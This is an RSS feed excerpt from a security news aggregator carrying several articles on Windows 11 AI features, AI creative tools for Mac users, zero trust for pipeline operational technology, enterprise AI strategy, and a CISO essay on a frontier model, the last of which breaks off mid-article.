<content:encoded><![CDATA[<p>OpenClaw’s rapid adoption, and the ecosystem forming around it, signal a shift in how AI is used at work. These platforms are accelerating “agentic” capabilities: systems that do more than… The post Openclaw And The Agentic AI Inflection Point: From…</p>
<p class="more-link-p"><a class="more-link" href="https://www.itsecuritynews.info/openclaw-and-the-agentic-ai-inflection-point-from-cool-demo-to-governed-infrastructure/">Read more →</a></p>
<p>The post <a href="https://www.itsecuritynews.info/openclaw-and-the-agentic-ai-inflection-point-from-cool-demo-to-governed-infrastructure/">Openclaw And The Agentic AI Inflection Point: From “Cool Demo” To Governed Infrastructure</a> appeared first on <a href="https://www.itsecuritynews.info/">IT Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[How Mac Users Are Getting More Out of AI Creative Work]]></title>
<description><![CDATA[For a long time, the Mac's reputation as a creative machine rested on its hardware and native apps — Final Cut, Logic, the tight integration between a Retina display and color-accurate tools. AI has started to quietly rewrite that equation.



The shift isn't dramatic. Most Mac users haven't aban...]]></description>
<link>https://tsecurity.de/de/3627699/ios-mac-os/how-mac-users-are-getting-more-out-of-ai-creative-work/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3627699/ios-mac-os/how-mac-users-are-getting-more-out-of-ai-creative-work/</guid>
<pubDate>Fri, 26 Jun 2026 16:22:31 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[For a long time, the Mac's reputation as a creative machine rested on its hardware and native apps — Final Cut, Logic, the tight integration between a Retina display and color-accurate tools. AI has started to quietly rewrite that equation.



The shift isn't dramatic. Most Mac users haven't abandoned their existing workflows. But something is changing in how people approach the early, messier stages of creative work — ideation, iteration, rapid visual exploration — and AI tools are filling a gap that native apps never really addressed.



The Friction Nobody Talks About



The real challenge with AI-assisted creative work isn't capability. The models are impressive. The friction is operational: too many platforms, too many tabs, too much manual handoff between steps.



A typical session might involve generating an image in one tool, downloading it, uploading it somewhere else for background removal, switching to another service for video conversion, and then losing track of which version came from which prompt. This kind of tool-hopping breaks the focused state that creative work depends on.



Mac users feel this acutely, because the platform has always rewarded deep, single-environment focus. The friction isn't a technical problem — it's a workflow problem.



What's Actually Changing







The most useful AI tools emerging right now aren't necessarily the ones with the most powerful models. They're the ones that minimize context-switching.



This is showing up in a few different ways:



Unified canvas environments. Some tools are moving toward a visual, node-based interface — where discrete AI tasks (image generation, background swap, video conversion) connect to each other on an infinite canvas, with outputs flowing directly from one step to the next. For Mac users who think spatially and work across large or multiple displays, this approach fits naturally. 



Multi-model access in one place. Rather than holding separate subscriptions to GPT Image 2, Seedance, Kling, Midjourney, or other services, users increasingly want a single interface where different models can be called on for different tasks within the same session. Banana Pro AI is one platform taking this direction — the model becomes a tool choice, not a platform commitment.



Reusable workflow templates. Once a pipeline is built — say, a product photo → model integration → short video sequence — it can be saved and rerun with new inputs. Tools like Workflow Studio make this possible without rebuilding from scratch each time. The setup cost is paid once, which matters most to anyone managing a content catalog or running regular production cycles.



The Mac Advantage in This Context



None of this is Mac-exclusive. But there are reasons Mac users tend to adopt these kinds of tools quickly.



The platform's culture has always favored deep tool mastery over constant app-switching. When a creative environment reduces friction and rewards learning its structure, Mac users lean in. The spatial thinking that makes tools like Figma, Miro, or even Xcode feel natural translates well to canvas-based AI workflows.



The device ecosystem matters too. Heavy work happens at a desk — MacBook Pro, external display, the full setup. But review, approval, and light adjustment increasingly happen on an iPhone. Tools that sync across both contexts fit into how Mac users already move through their day.



The Shift in Creative Roles



What AI actually changes isn't the final output — it's who can generate a first draft, and how quickly.



A solo designer can now run product photography variations, motion concepts, and visual alternates in a single session that would have previously required a photographer, a video editor, and several rounds of back-and-forth. The creative direction still comes from the person. The labor-intensive middle steps increasingly don't.



This doesn't collapse the value of craft. If anything, it raises the bar for creative judgment — because the bottleneck is no longer production capacity, it's the quality of decisions made at each step. Mac users who treat these tools as leverage for their existing skills, rather than replacements for them, tend to get the most out of them.



A Practical Reality



The honest version of this story isn't that AI has transformed creative work overnight. Most professionals are still figuring out where it fits and where it doesn't.



What has changed is that the experimentation cost has dropped. Trying a visual direction, running a quick motion test, exploring a product presentation format — these used to require either significant time or significant budget. They increasingly don't.



For Mac users with an existing creative practice, that's not a disruption. It's an expansion of what's possible in a single afternoon's work.]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft is turning Windows 11 into an AI operating system]]></title>
<description><![CDATA[For years, Microsoft has hyped Windows 11 cas an OS with AI, and the company is finally putting the building blocks in place for that transformation.



Microsoft execs shared examples of how the company is integrating AI in Windows 11 at its Build event earlier this month, highlighting how AI mo...]]></description>
<link>https://tsecurity.de/de/3627117/ai-nachrichten/microsoft-is-turning-windows-11-into-an-ai-operating-system/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3627117/ai-nachrichten/microsoft-is-turning-windows-11-into-an-ai-operating-system/</guid>
<pubDate>Fri, 26 Jun 2026 13:03:29 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>For years, Microsoft has hyped Windows 11 cas an OS with AI, and the company is finally putting the building blocks in place for that transformation.</p>



<p>Microsoft execs shared examples of how the company is integrating AI in Windows 11 at its <a href="https://build.microsoft.com/en-US/home" target="_blank" rel="noreferrer noopener">Build event</a> earlier this month, highlighting how AI models and agents will make the OS smarter, allowing users to interact with it using natural language and intent.</p>



<p>Specifically, Windows 11 PCs will provide unmetered intelligence so users can run AI for free without a network connection. “No token cost. No sensitive data leaves the device. It also reduces latency,” Anastasiya Tarnouskaya, product manager for Windows ML, said <a href="https://build.microsoft.com/en-US/sessions/BRK260?source=sessions" target="_blank" rel="noreferrer noopener">during a Build session</a>.</p>



<p>Hardware makers introduced AI-capable hardware before the applications were available. But Tarnouskaya said more than 500 million PCs are already running local AI workloads. “Thanks to recent advancements in AI models, hardware, and the software stacks that run them, today, every Windows PC is becoming increasingly AI-capable,” she said. </p>



<p>The AI experiences are blended into apps and the Windows UI, not working only as chatbots such as those offered by ChatGPT or Gemini. </p>



<p>Microsoft Office, Photos and Teams already use on-device AI capabilities, with Outlook, for instance, summarizing emails using Microsoft’s Phi Silica model and a GPU on the PC.</p>



<p>“And it’s not just developers that are betting on local AI…, [companies] from Adobe to WhatsApp are building some incredible local AI-powered experiences.” Tarnouskaya said. Other early adopters include Canva, Affinity, and Speechify.</p>



<p>AI apps for Windows 11 proliferated after Microsoft shipped Windows ML last fall, she said. (Windows ML helps developers create offline AI applications without accessing cloud models. It maps applications, localized AI models and hardware such as GPUs and neural processors.)</p>



<p>Windows ML is part of Microsoft’s “Foundry” portfolio of products, which includes Foundry Local for running open-source models on Windows devices, and Windows AI APIs that automate tasks such as conversation summarization, speech recognition, and video upscaling.</p>



<p>Microsoft is also turning to AI agents to change how users interact with Windows 11. Users can describe a task through natural language, and a long-running agent will get to work and complete the action. “Windows is evolving into a platform where natural language can map to real system outcomes,” said Samantha Song, product manager for Windows at Microsoft.</p>



<p>Song demonstrated how users could just tell or type how they want to personalize colors, wallpaper, or menus, and <a href="https://build.microsoft.com/en-US/sessions/OD858?source=sessions" target="_blank" rel="noreferrer noopener">the agent will do it</a>. “There is no manual set up against themes, setting or lighting. The system treats it as one coherent action,” Song said.</p>



<p>For the effort to succeed, developers will need to create a skills file that maps how an agent behaves. That skill can then be reused over and over again, Song said.</p>



<p>“At the enterprise level, you could imagine a world where a user switches into a secure finance mode, and the system aligns apps, access boundaries and environment automatically,” Song said.</p>



<p>Microsoft also demonstrated how <a href="https://www.youtube.com/watch?v=J7ol1VDkg7w&amp;t=2s">OpenClaw can be used to create personalized agents</a> to run Windows functions.</p>



<p>At Build, <a href="http://llmware.ai/">LLMware.ai</a> demonstrated <a href="https://build.microsoft.com/en-US/sessions/DEMSP380?source=sessions" target="_blank" rel="noreferrer noopener">an agent on a Qualcomm laptop that collects Jira issues in real-time</a>, summarizes them locally, and emails daily summaries of top issues to the team. The agent runs automatically without prompting.</p>



<p>“You can get optimized performance on the NPU [neural processing unit] by running the model locally…and you also implement a scheduled run of your automated agents,” said Darren Oberst, co-founder of LLMWare.ai.</p>



<p>Samsung, Lenovo and others are rolling out — albeit slowly and carefully — agentic AI features under the moniker of ‘personal AI,’” said Leonard Lee, principal analyst at Next Curve. “The problem is ensuring safe deployment,” he said.</p>



<p>Microsoft’s efforts to embed AI in Windows will force enterprises to rethink hardware strategies, said Jack Gold, principal analyst at J. Gold Associates. And since AI chips excel at different tasks, Microsoft will have to support multiple chips to offer choice to enterprises, he said.</p>



<p>“We recommend — and others do, too — that any new PC purchases, especially for enterprise, be done with this in mind and purchase AI PCs during any upgrade cycle,” Gold said.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[What CISOs need to tell the board about zero trust in OT: A 90-day communication and action plan]]></title>
<description><![CDATA[I work as a principal specialist at a pipeline operator where Operational Technology (OT) is the backbone of the business. I do not report to the board or act as a CISO, but the issues that get raised to those levels affect my job every single day.



Since the Colonial pipeline ransomware incide...]]></description>
<link>https://tsecurity.de/de/3626998/it-security-nachrichten/what-cisos-need-to-tell-the-board-about-zero-trust-in-ot-a-90-day-communication-and-action-plan/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3626998/it-security-nachrichten/what-cisos-need-to-tell-the-board-about-zero-trust-in-ot-a-90-day-communication-and-action-plan/</guid>
<pubDate>Fri, 26 Jun 2026 12:09:07 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>I work as a principal specialist at a pipeline operator where Operational Technology (OT) is the backbone of the business. I do not report to the board or act as a CISO, but the issues that get raised to those levels affect my job every single day.</p>



<p>Since the <a href="https://www.energy.gov/ceser/colonial-pipeline-cyber-incident">Colonial pipeline ransomware incident in 2021</a>, it has become apparent that our industry has started posing different tones of “Are we zero trust yet?” I frequently witness its intense significance through auditing requests, TSA security directives and conversations around some control project’s goals.</p>



<p>One experience the zero trust role has changed is that it often feels misaligned with OT heavy environments. The NIST’s <a href="https://tsapps.nist.gov/publication/get_pdf.cfm?pub_id=930420">Zero Trust Architecture (SP 800‑207) model</a> works for all, but is originally written as though for an IT network, not terminals, compressor stations and control rooms where equipment must run 24/7, perhaps more aged than the technology present within the organization. CISA’s guidance on <a href="https://www.ic3.gov/CSA/2026/260429.pdf" target="_blank" rel="noreferrer noopener">adapting zero trust principles to operational technology</a> helps close that gap, but applying it means satisfying the OT teams and company leadership at the same time.</p>



<h2 class="wp-block-heading">The zero trust question I hear behind the scenes</h2>



<p>I am pretty sure we all know it comes as a jolt of reality after something really major has happened, rather than a bullet point on a slide deck. You have pipeline. The whole distribution stops for six days. In Washington, DC, US congressional hearings are underway, and legislation is coming. <a href="https://www.tsa.gov/sites/default/files/tsa_sd_pipeline-2021-02-july-21_2022.pdf">TSA Directive 2021-02C</a> requires pipeline operators to attest to several things, like network segmentation and zero-trust architectures.</p>



<p><a href="https://www.nerc.com/globalassets/standards/reliability-standards/cip/cip-013-2.pdf">NERC CIP-013</a> exists on a similar tack, more around supply chain security. In our case, the decision on how to select and manage a vendor partner and control their remote access is driven by regulatory compliance and governance frameworks. So, you have all those things that happen externally and force change. They say, “Are you zero trust? Yes or no?” We always get “yes.” They know it is not “yes, ” and the vendors know it is not “yes,” and nothing gets done about it until something happens.</p>



<h2 class="wp-block-heading">How I reframe zero trust for OT in my work</h2>



<p>My influence comes from how I frame problems and options in the conversations I am invited into. Zero trust is a good example.</p>



<p>NIST’s SP 800‑207 describes zero trust as a model where access decisions are to be based on strong identity, policy and context rather than network. CISA’s OT guidance narrows it, advising operators on the appearance of devices, identity management and what overlaps with IT instead of the overall replacement. <a href="https://www.csoonline.com/article/4143100/why-zero-trust-breaks-down-in-iot-and-ot-environments.html" target="_blank">Why zero trust breaks down in IoT and OT environments</a>” highlights that when facing the complications of IoT and OT environments, one needs to be proactive.</p>



<p>During these conversations, I try to focus on three major points when talking about IoT.</p>



<ol class="wp-block-list">
<li>Refer to zero trust as its functioning principle. In my experience, teams respond better when I say “Every user and system has to prove who they are and why they need access” than when I talk about abstract architectures. That language matches what NIST and CISA emphasize without overwhelming people with jargon.</li>



<li>Focus on where IT and OT converge, like jump hosts, historian connections, remote access paths and shared identity stores that span both worlds. Those are the choke points where zero trust style controls like stronger authentication, least privilege and detailed logging can give us quick wins without disrupting operations that depend on predictable behavior.</li>



<li>Tie everything that we need to do to the existing requirements. The conversation moves from “why are we changing this?” to “how do we do this well?” which aligns with TSA Security Directive Pipeline‑2021‑02C, a CISA alert or a NERC CIP‑013 requirement.</li>
</ol>



<h2 class="wp-block-heading">A 90-day plan OT leaders can execute</h2>



<p>While someone operates a gas pipeline, they cannot play around with zero trust. Questions such as: “What can we accomplish before the TSA checks up next quarter?” Or “How can we show the internal audit team we are making progress this month?” comes often. We have established a list of actions we take over in a ninety-day plan, because we find it aligns more with our industrial settings while also being transferable to other OT settings.</p>



<h3 class="wp-block-heading">Days 1–30: Map assets and identities at the IT/OT boundary</h3>



<p>The first 30 days are for increased visibility. I focus on a relatively simple question: “Who and what can currently reach OT, intentionally or accidentally?”</p>



<p>CISA’s guidance on zero trust for OT, alongside other warnings, advocates for identifying and managing assets and communications where IT and OT interfaces exist, in addition to informal remote access routes. Also, TSA requires pipeline operators to regularly update and manage plans detailing which networks, systems and access points they will assess as per their established requirements across both IT and OT.</p>



<p>In my position, it comes down to three actions. First, I work with OT engineers, network staff and asset inventory systems to determine which OT assets threaten operations, safety or compliance if compromised, rather than inventorying every device. Second, I map the users and links that reach into OT, such as internal staff granted advanced privileges, remote vendor support, VPNs and cloud platforms that interact with production data. Third, I categorize these identities and connections based on risk, impact and exposure, not by their roles.</p>



<p>By the close of the first 30 days, the intention is to present leadership with an easily comprehensible overview: outlining the critical OT assets, delineating the entry points from both internal IT systems and external sources and identifying the associated identities. Having established this common understanding makes subsequent zero trust discussions less vague.</p>



<h3 class="wp-block-heading">Days 31–60: Contain vendor remote access and create early wins</h3>



<p>Look for quick wins in the next month, in a high-impact but non-disruptive area. Vendor or third-party remote access often fulfills it, and CISA has warned about it and continues to do so.</p>



<p>Their guidance emphasizes best practices, including using MFA, segmented user privileges and monitoring third-party activity independently. The NERC CIP-013 requires utilities to consider cybersecurity threats and risk management that protect their supply chains and suppliers that connect to critical systems. The TSA’s pipeline directives expect close monitoring and controls of remote access. In my case, early wins look like telling a vendor: OK, instead of an unsecured, remote access method, use an audited brokered remote access solution. MFA for any and all remote OT sessions. Close old vendor RDP connections that are not in service. You are simply saying that times change and since these methods were put in place a few years back, they have evolved; it is reasonable for you to evolve.</p>



<h3 class="wp-block-heading">Days 61–90: Build a simple maturity scorecard and narrative</h3>



<p>The third month is about visibility and repeatable progress. We now will have more clarity on assets and identities traversing the IT/OT boundary and have choked down the most dangerous of remote access paths. Now we will take time to track where we have been over time.</p>



<p>I will consult with leaders within security and OT teams to identify the right-sized set of metrics relevant to the specific context of the organization. While the specific terminology may vary, many will align with common language found in TSA, NERC, CISA and other industry documents. Consider the broad themes of “govern, protect and detect &amp; respond”.</p>



<p>We can then identify solid “now” and “better next quarter” capabilities within each of these themes. “Govern” could incorporate specific OT policies on identity and access management that pull in zero trust directives alongside existing authoritative frameworks. “Protect” might track what fraction of your high-impact OT assets have been put behind better segmentation practices, coupled with the percent of your remote access pathways to OT identified as high-risk that have both MFA and a brokered connection. “Detect &amp; respond” could see tested playbooks in place assuming a remote connection compromise that directly injects malware into an OT system, which aligns with how recent incidents have unfolded throughout North American utilities.</p>



<p>The output is not a scorecard to pass around but will be a meaningful, honest conversation for our leaders. You will know how to accurately frame how your organization applies zero trust in the OT world today, show what you achieved over the past three months and honestly describe where there is more work ahead.</p>



<p>I am not the only one trying to make zero trust ideas actually fit OT, and I pay attention to the CISOs who voice the same frustrations with IoT and OT environments. We are solving the same problem from different seats. What I have found is that a workable 90-day plan, updated monthly, beats any pledge to “Let us achieve zero trust together”</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.csoonline.com/expert-contributor-network/">Want to join?</a></strong></p>



<p></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Shaping a lasting AI strategy in a fast-changing world]]></title>
<description><![CDATA[AI is entering a phase of sustained enterprise adoption. As the technology rapidly advances, organizations are moving beyond isolated use cases and short-term efficiency gains and rethinking how they use AI to create value, meet changing customer expectations and evolve their operating models ove...]]></description>
<link>https://tsecurity.de/de/3626996/it-security-nachrichten/shaping-a-lasting-ai-strategy-in-a-fast-changing-world/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3626996/it-security-nachrichten/shaping-a-lasting-ai-strategy-in-a-fast-changing-world/</guid>
<pubDate>Fri, 26 Jun 2026 12:09:04 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>AI is entering a phase of sustained enterprise adoption. As the technology rapidly advances, organizations are moving beyond isolated use cases and short-term efficiency gains and rethinking how they use AI to create value, meet changing customer expectations and evolve their operating models over the next several years.</p>



<p>That requires a clear end goal, an honest assessment of current capabilities and a practical roadmap for moving from today’s reality to that end goal.</p>



<p>Today, we are seeing five accelerating trends shaping how that transition is unfolding.</p>



<h2 class="wp-block-heading">LLMs are evolving into AgenticOS platforms</h2>



<p>Horizontal LLM providers like Anthropic and vertical AI companies like Harvey are moving beyond standalone AI models and building broader enterprise platforms. These platforms combine AI models with workflows, playbooks, integrations and governance tools inside a single environment, which are beginning to be described as an “AgenticOS.” As a result, the market is beginning to consolidate around a smaller number of platform providers that can simplify procurement, integration, spend management and data privacy compliance.</p>



<h2 class="wp-block-heading">Context windows have expanded by orders of magnitude</h2>



<p>Leading AI models can now process dramatically more information at once than they could just a few years ago, with the amount of information they can analyze in a single interaction expanding roughly 125× since 2023. That shift is making more complex, enterprise-scale work, like large-scale contract review, codebase-wide analysis and multi-document research synthesis, possible. Such capabilities, which once felt cutting-edge, are becoming standard expectations.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/flagship-llm-context-window-evolution.png" alt="Figure 1: Flagship LLM context window evolution, OpenAI and Anthropic, March 2023 – May 2026." class="wp-image-4189596" width="986" height="654" sizes="auto, (max-width: 986px) 100vw, 986px"><figcaption class="wp-element-caption"><em>Figure 1: Flagship LLM context window evolution, OpenAI and Anthropic, March 2023 – May 2026.</em></figcaption></figure><p class="imageCredit">John Wei</p></div>



<h2 class="wp-block-heading">Token pricing has stabilized at the production tier</h2>



<p>After dropping rapidly between 2023 and 2025, the cost of using mainstream AI models has started to stabilize. Today, many enterprise-grade models fall within a <a href="https://intuitionlabs.ai/articles/llm-api-pricing-comparison-2025" rel="nofollow">relatively predictable range</a> of roughly $2–$3 per million input tokens and about $15 per million output tokens, making costs easier to anticipate and manage.</p>



<p>At the same time, cost-saving features like prompt caching (which can reduce costs by up to 90%) and batch APIs (which can cut costs by roughly 50%) are making AI significantly cheaper to operate at scale. Together, those shifts are making AI spending easier for enterprises to budget, forecast and manage like other core technology investments.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" decoding="async" src="https://b2b-contenthub.com/wp-content/uploads/2026/06/flagship-llm-token-cost-evolution.png?w=1024" alt="Figure 2: Flagship LLM token cost evolution, OpenAI and Anthropic, March 2023 – May 2026." class="wp-image-4189595" width="1024" height="650" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><em>Figure 2: Flagship LLM token cost evolution, OpenAI and Anthropic, March 2023 – May 2026.</em></figcaption></figure><p class="imageCredit">John Wei</p></div>



<h2 class="wp-block-heading">AI is functioning as a productivity assistant, not a human replacement.</h2>



<p>I had the chance to speak with senior leaders at this year’s WSJ Future of Everything conference, and one theme consistently emerged: despite the hype around AI agents, many companies are still using AI to support human decision-making rather than replace it.</p>



<p>Data shared by the senior leadership team of a prominent AI company at the WSJ conference shows that AI agents consume less than 5% of tokens today, and 84% of enterprise use cases are growth-focused rather than productivity-focused. That is largely because AI workflows still depend heavily on the quality and consistency of inputs. In complex enterprise environments with variable scenarios and edge cases, human judgment, prompt refinement and iterative review remain essential.</p>



<p>As a result, workflows can rarely be fully automated, and many automation gains translate into incremental productivity improvements rather than meaningful headcount reduction without broader operating model changes.</p>



<p>Instead, many organizations are using AI to drive growth, support new business models and enable new ways of operating.</p>



<h2 class="wp-block-heading">Software development is the leading edge of human-AI collaboration.</h2>



<p>In our experience at Integreon, vibe coding has produced a few notable success stories. At enterprise scale, though, it can introduce architectural limitations and sometimes even hardcoding or semi-hardcoded shortcuts that undermine the long-term sustainability of the code. As a result, we primarily use AI coding tools as developer assistants for targeted tasks rather than end-to-end software development. That approach reflects a broader industry trend: <a href="https://www.techtimes.com/articles/315282/20260321/tech-layoffs-surge-while-ai-jobs-soar-key-trends-shaping-2026-tech-industry.htm" rel="nofollow">despite high-profile tech layoffs, overall demand for developers has remained steady, and demand for developers with AI skills is rising.</a></p>



<p>Across all five trends, the focus has shifted from automating legacy workflows to assisting human workflows. This is a fundamental change in how work will be organized across the enterprise.</p>



<p>As AI technologies mature and become widely accessible across industries, competitive advantage will increasingly come from strategy rather than the technology itself. Many businesses will have access to the same AI platforms, models and tools. What will differentiate organizations is how they apply those technologies to shape customer experience, operating models and market positioning.</p>



<p>The airline industry offers a useful parallel. Most airlines operate similar aircraft under the same regulatory and labor constraints, yet they differ dramatically in market positioning, customer experience and operational performance. What separates airlines is not the plane itself, but how the business is built around it.</p>



<p>For CIOs and CTOs, choosing an AI platform is no longer the main challenge. The more important conversations now center on where the business is headed and how AI supports that strategy. Leaders must ask themselves questions like:</p>



<ul class="wp-block-list">
<li><strong>Who do we want to become?</strong> Most enterprises have mission statements, but far fewer know exactly where they want the business to go over the next three to five years as AI reshapes customer expectations, competition and economics. That answer needs to be concrete enough to guide real decisions.</li>
</ul>



<ul class="wp-block-list">
<li><strong>Wh</strong><strong>at are we choosing not to do</strong><strong>?</strong> Strategic restraint matters just as much as strategic ambition. AI lowers many costs, making it tempting for organizations to spread themselves across too many initiatives. But without clear boundaries, organizations risk stretching resources too thin.</li>
</ul>



<ul class="wp-block-list">
<li><strong>Where </strong><strong>are we</strong><strong> today?</strong> That means taking a real look at which parts of the business AI may shrink or disrupt over the next three to five years. Many companies struggle to assess this honestly because those areas still generate revenue today. Sometimes it takes an outside perspective to spot risks internal teams are too close to see.</li>
</ul>



<ul class="wp-block-list">
<li><strong>What capabilities do we need to succeed three to five years from now</strong><strong>?</strong> Companies often plan by projecting today’s business forward instead of starting with where they want to end up. Usually, the answer comes down to a few key differentiators, like proprietary data, customer trust or distribution, along with a broader set of capabilities that simply need to be strong and reliable.</li>
</ul>



<ul class="wp-block-list">
<li><strong>How will we organize</strong><strong> work</strong><strong>? </strong>Enterprises must rethink how work gets done. Most operating models today were built around human labor. Going forward, many workflows will likely be shared between AI systems and human oversight.</li>
</ul>



<ul class="wp-block-list">
<li><strong>What kind of talent do we need?</strong> This can be especially difficult for companies with long histories and established teams. Employees who drove success in the past may not align perfectly with where the business is headed next. Companies will need to think carefully about how experienced employees can help build and support future capabilities.</li>
</ul>



<ul class="wp-block-list">
<li><strong>Where can we </strong><strong>simplify</strong><strong> workflows?</strong> In many cases, workflows can be reduced to three core steps. First is building context, including defining the goals, data, constraints and decision-making framework. Then comes AI execution, where AI is applied to workflows and tasks. Finally, humans review outputs and make judgment calls.</li>
</ul>



<ul class="wp-block-list">
<li><strong>Which AI platforms do we actually need?</strong> Most enterprises do not have the capacity to effectively manage dozens of AI vendors and tools at once. Every additional platform adds more integration work, governance, vendor oversight and security review requirements. In most cases, organizations are better off making a small number of focused platform bets than constantly chasing the latest AI tool.</li>
</ul>



<h2 class="wp-block-heading">Finally, a few thoughts on what to avoid</h2>



<p>The best mentors I’ve had taught me to think in three-to-five-year terms. A good strategy should remain relatively stable over that period. Without that consistency, organizations end up resetting direction too often and losing credibility in the process.</p>



<p>Today, I see two common mistakes. The first is staying too anchored to the past, defaulting to reasons something cannot happen because of security, compliance or organizational resistance. The second is the opposite: chasing every new technology simply because it is new. Most enterprises will need to find a middle ground over the next several years.</p>



<p>AI is the aircraft. Strategy is the route.</p>



<p>The companies that pull ahead will not necessarily be the ones spending the most on AI or launching the most pilots. They will be the ones whose leaders answered the hard questions, stayed committed to a direction and learned from mistakes along the way.</p>



<p>Technology will continue to change. Strategy is what will determine who uses it well.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want to join?</a></strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Mythos is a signal, not a siren: What frontier AI should change for CISOs]]></title>
<description><![CDATA[When a new AI capability starts making headlines, I see the same pattern play out in boardrooms and executive staff meetings. The technology is introduced as a looming breakthrough for attackers. The conversation quickly shifts to worst-case scenarios. Then security leaders are asked some version...]]></description>
<link>https://tsecurity.de/de/3626884/it-security-nachrichten/mythos-is-a-signal-not-a-siren-what-frontier-ai-should-change-for-cisos/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3626884/it-security-nachrichten/mythos-is-a-signal-not-a-siren-what-frontier-ai-should-change-for-cisos/</guid>
<pubDate>Fri, 26 Jun 2026 11:23:28 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>When a new AI capability starts making headlines, I see the same pattern play out in boardrooms and executive staff meetings. The technology is introduced as a looming breakthrough for attackers. The conversation quickly shifts to worst-case scenarios. Then security leaders are asked some version of the same question: Are we suddenly exposed in ways we were not exposed before?</p>



<p>My answer is usually no.</p>



<p>In most organizations, the bigger issue is not that a frontier model such as Mythos will magically create a new category of risk overnight. It is that these models can accelerate work on both sides of the cybersecurity equation. Attackers may use them to move faster, but defenders can use them to identify, prioritize and fix weaknesses that have been sitting in plain sight for years.</p>



<p>That is why I view Mythos as a signal, not a siren. It signals that the economics of cyber offense and defense are changing. It does not signal that security fundamentals no longer matter. If anything, it proves the opposite. The organizations that have clear asset visibility, disciplined patching, strong identity controls and resilient operating models will be in a far better position to absorb whatever AI changes next.</p>



<p>That perspective matters because recent breach reporting still points to familiar failure points. Verizon’s <a href="https://www.verizon.com/business/resources/Tea/reports/2025-dbir-data-breach-investigations-report.pdf">2025 Data Breach Investigations Report</a> shows that credential abuse and vulnerability exploitation remain central themes in how organizations get compromised, with exploitation continuing to rise. In other words, the path into the enterprise is still usually paved by weaknesses security teams already understand.</p>



<h2 class="wp-block-heading">The real problem is still the basics</h2>



<p>In my experience, many organizations do not have a strategy problem as much as they have an execution problem. Security leaders know the basics. Their teams know the basics. Their auditors, regulators and board committees know the basics. The struggle is sustaining those basics consistently across hybrid estates, aging systems, cloud platforms, remote users and sprawling third-party dependencies.</p>



<p>That is why I am cautious when I hear predictions that AI will fundamentally change which controls are relevant. Most successful breaches still start with a known weakness that was not remediated, not prioritized correctly or not visible in the first place. An unpatched internet-facing system. A misconfigured identity relationship. Excessive privilege. Weak segmentation. A service account nobody has reviewed in years. A business-critical exception that quietly became permanent.</p>



<p>I have seen security programs lose momentum when they over-rotate toward the newest threat narrative. They start funding edge use cases while old control gaps remain open. They buy more tooling before fixing ownership, process discipline and accountability. They treat cybersecurity maturity as a collection of projects instead of an operating model. That approach was risky before frontier AI, and it will be even riskier if these models compress attacker timelines further.</p>



<p>If Mythos changes anything for most enterprises, it changes the urgency of getting the basics right. It increases the cost of delays. It raises the penalty for security debt. It puts more pressure on teams that already struggle to inventory assets, rationalize findings and close the delta between what they know and what they have actually fixed.</p>



<p>That shift should also change the way we prioritize work. In many programs, vulnerability backlogs grow because teams are making decisions in fragments. Infrastructure owns one piece. Security operations own another. Identity, cloud and application teams each see a different slice of the problem. What gets lost is the full risk picture. That is why so many organizations feel busy but not measurably safer. They are addressing issues, but they are not consistently reducing the combinations of weakness that attackers actually exploit.</p>



<p>The practical takeaway is straightforward. Before leaders assume Mythos creates a completely new threat model, they should ask a simpler question: Where are we still weak in ways that an attacker would recognize immediately? In my experience, that question leads to a more honest and productive discussion than any speculative debate about what AI may eventually do.</p>



<h2 class="wp-block-heading">AI can help defenders close the gaps they already know they have</h2>



<p>The more constructive way to think about Mythos is to ask where frontier AI can improve defensive capacity right now. I do not mean replacing analysts or handing sensitive decisions to a model without oversight. I mean using AI to tackle problems security teams have long understood but have not had the scale or time to address consistently.</p>



